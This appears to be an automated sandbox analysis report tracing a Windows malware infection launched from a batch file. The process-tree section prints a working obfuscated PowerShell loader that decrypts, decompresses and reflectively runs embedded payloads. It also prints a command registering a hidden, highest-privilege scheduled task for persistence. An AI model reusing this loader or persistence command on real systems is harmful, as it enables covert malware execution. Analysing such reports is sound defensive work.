\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655751018336" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exemshta.exepid process 2652 powershell.exe 2652 powershell.exe 2736 powershell.exe 2736 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 3972 msedge.exe 3972 msedge.exe 2340 msedge.exe 2340 msedge.exe 2604 identity_helper.exe 2604 identity_helper.exe 3740 powershell.exe 3740 powershell.exe 856 powershell.exe 856 powershell.exe 3740 powershell.exe 856 powershell.exe 4664 powershell.exe 4664 powershell.exe 2688 powershell.exe 2688 powershell.exe 4664 powershell.exe 2688 powershell.exe 2360 svchost.exe 2360 svchost.exe 4996 mshta.exe 4996 mshta.exe 4996 mshta.exe 4996 mshta.exe 4996 mshta.exe 4996 mshta.exe 2360 svchost.exe 2360 svchost.exe 2360 svchost.exe 2360 svchost.exe 4996 mshta.exe 4996 mshta.exe 2360 svchost.exe 2360 svchost.exe 4996 mshta.exe 4996 mshta.exe 2360 svchost.exe 2360 svchost.exe 4996 mshta.exe 4996 mshta.exe 2360 svchost.exe 2360 svchost.exe 4996 mshta.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3488 Explorer.EXE -
Suspicious behavior: LoadsDriver 6 IoCs
Processes:
pid 4 4 4 4 4 656 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
Processes:
msedge.exepid process 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe Token: 36 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe Token: 36 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
Processes:
msedge.exeExplorer.EXEmsdt.exepid process 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 5892 msdt.exe 3488 Explorer.EXE 3488 Explorer.EXE 2340 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exeExplorer.EXEpid process 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
svchost.exemshta.exeExplorer.EXEpid process 2360 svchost.exe 4996 mshta.exe 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4600 wrote to memory of 264 4600 cmd.exe cmd.exe PID 4600 wrote to memory of 264 4600 cmd.exe cmd.exe PID 4600 wrote to memory of 2652 4600 cmd.exe powershell.exe PID 4600 wrote to memory of 2652 4600 cmd.exe powershell.exe PID 2652 wrote to memory of 2736 2652 powershell.exe powershell.exe PID 2652 wrote to memory of 2736 2652 powershell.exe powershell.exe PID 2652 wrote to memory of 2148 2652 powershell.exe WScript.exe PID 2652 wrote to memory of 2148 2652 powershell.exe WScript.exe PID 2148 wrote to memory of 1756 2148 WScript.exe cmd.exe PID 2148 wrote to memory of 1756 2148 WScript.exe cmd.exe PID 1756 wrote to memory of 412 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 412 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 620 1756 cmd.exe powershell.exe PID 1756 wrote to memory of 620 1756 cmd.exe powershell.exe PID 620 wrote to memory of 3488 620 powershell.exe Explorer.EXE PID 620 wrote to memory of 2560 620 powershell.exe svchost.exe PID 620 wrote to memory of 1968 620 powershell.exe svchost.exe PID 620 wrote to memory of 1372 620 powershell.exe svchost.exe PID 620 wrote to memory of 1764 620 powershell.exe svchost.exe PID 620 wrote to memory of 1564 620 powershell.exe svchost.exe PID 620 wrote to memory of 1124 620 powershell.exe svchost.exe PID 620 wrote to memory of 2740 620 powershell.exe svchost.exe PID 620 wrote to memory of 1552 620 powershell.exe svchost.exe PID 620 wrote to memory of 2728 620 powershell.exe svchost.exe PID 620 wrote to memory of 1788 620 powershell.exe svchost.exe PID 620 wrote to memory of 1736 620 powershell.exe svchost.exe PID 620 wrote to memory of 3620 620 powershell.exe svchost.exe PID 620 wrote to memory of 1132 620 powershell.exe svchost.exe PID 620 wrote to memory of 3692 620 powershell.exe svchost.exe PID 620 wrote to memory of 2312 620 powershell.exe svchost.exe PID 620 wrote to memory of 1316 620 powershell.exe svchost.exe PID 620 wrote to memory of 1116 620 powershell.exe svchost.exe PID 620 wrote to memory of 2884 620 powershell.exe svchost.exe PID 620 wrote to memory of 1700 620 powershell.exe svchost.exe PID 620 wrote to memory of 2680 620 powershell.exe svchost.exe PID 620 wrote to memory of 2876 620 powershell.exe svchost.exe PID 620 wrote to memory of 5032 620 powershell.exe svchost.exe PID 620 wrote to memory of 912 620 powershell.exe svchost.exe PID 620 wrote to memory of 508 620 powershell.exe svchost.exe PID 620 wrote to memory of 896 620 powershell.exe svchost.exe PID 620 wrote to memory of 2056 620 powershell.exe svchost.exe PID 620 wrote to memory of 2252 620 powershell.exe svchost.exe PID 620 wrote to memory of 1660 620 powershell.exe svchost.exe PID 620 wrote to memory of 1460 620 powershell.exe svchost.exe PID 620 wrote to memory of 2244 620 powershell.exe svchost.exe PID 620 wrote to memory of 2036 620 powershell.exe svchost.exe PID 620 wrote to memory of 2232 620 powershell.exe svchost.exe PID 620 wrote to memory of 1144 620 powershell.exe svchost.exe PID 620 wrote to memory of 944 620 powershell.exe svchost.exe PID 620 wrote to memory of 1820 620 powershell.exe svchost.exe PID 620 wrote to memory of 1224 620 powershell.exe svchost.exe PID 620 wrote to memory of 4376 620 powershell.exe svchost.exe PID 620 wrote to memory of 2992 620 powershell.exe svchost.exe PID 620 wrote to memory of 1216 620 powershell.exe svchost.exe PID 620 wrote to memory of 2976 620 powershell.exe svchost.exe PID 620 wrote to memory of 1000 620 powershell.exe svchost.exe PID 620 wrote to memory of 1328 620 powershell.exe svchost.exe PID 620 wrote to memory of 788 620 powershell.exe svchost.exe PID 620 wrote to memory of 3356 620 powershell.exe svchost.exe PID 620 wrote to memory of 1976 620 powershell.exe svchost.exe PID 620 wrote to memory of 744 620 powershell.exe hat.exe PID 620 wrote to memory of 744 620 powershell.exe hat.exe PID 620 wrote to memory of 744 620 powershell.exe hat.exe PID 620 wrote to memory of 4996 620 powershell.exe mshta.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵
-
C:\Windows\System32\sdiagnhost.exeC:\Windows\System32\sdiagnhost.exe -Embedding2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter3⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter3⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel2⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel2⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
- Modifies firewall policy service
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Output.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Local\Temp\Output.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_962_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.08⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec2047189⤵
-
